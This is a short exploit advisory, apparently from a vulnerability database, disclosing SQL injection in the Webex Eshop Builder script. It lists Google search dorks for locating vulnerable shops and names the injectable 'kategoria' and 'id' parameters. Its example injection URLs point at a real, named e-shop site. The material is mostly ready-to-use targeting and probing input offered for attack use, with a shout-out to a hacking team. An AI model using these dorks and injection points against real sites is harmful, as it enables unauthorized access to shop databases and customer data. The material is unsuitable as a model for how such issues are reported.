Webex Eshop Builder SQL Injection

2012.06.05
Credit: Mr.XpR
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
Dork: inurl:index.php?m=detail&id= or inurl:m=detail&id=

-------------------- IN The NAme OF God -------------------- -====webex eshop builder Sql Injection====- # Exploit Title: webex eshop builder Sql Injection # Exploit Author: Mr.XpR # Tested on: BackTrack # Script Site : http://www.webex.sk/ # MAil : No0PM[at]yahoo[dot]com -====Dork====- inurl:index.php?m=detail&id= inurl:m=detail&id= -====Exploit====- http://professionalsport.sk/eshop/index.php?m=search&kategoria=[Sqli] -====Example====- http://professionalsport.sk/eshop/index.php?m=detail&id=2283' http://professionalsport.sk/eshop/index.php?m=search&kategoria=999' -====Tnx To====- MMT- Syamak Black - Samim.s - FarbodEZRaeL - Inj3Ctor - UnknowN Yaghi_Vahshi - HELLBOY - IrIsT - Black_King - Monfared - Sokote_Vahshat ... And All IraNHAck Security Team Members iranhack.org

References:

http://www.webex.sk/
http://iranhack.org/


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top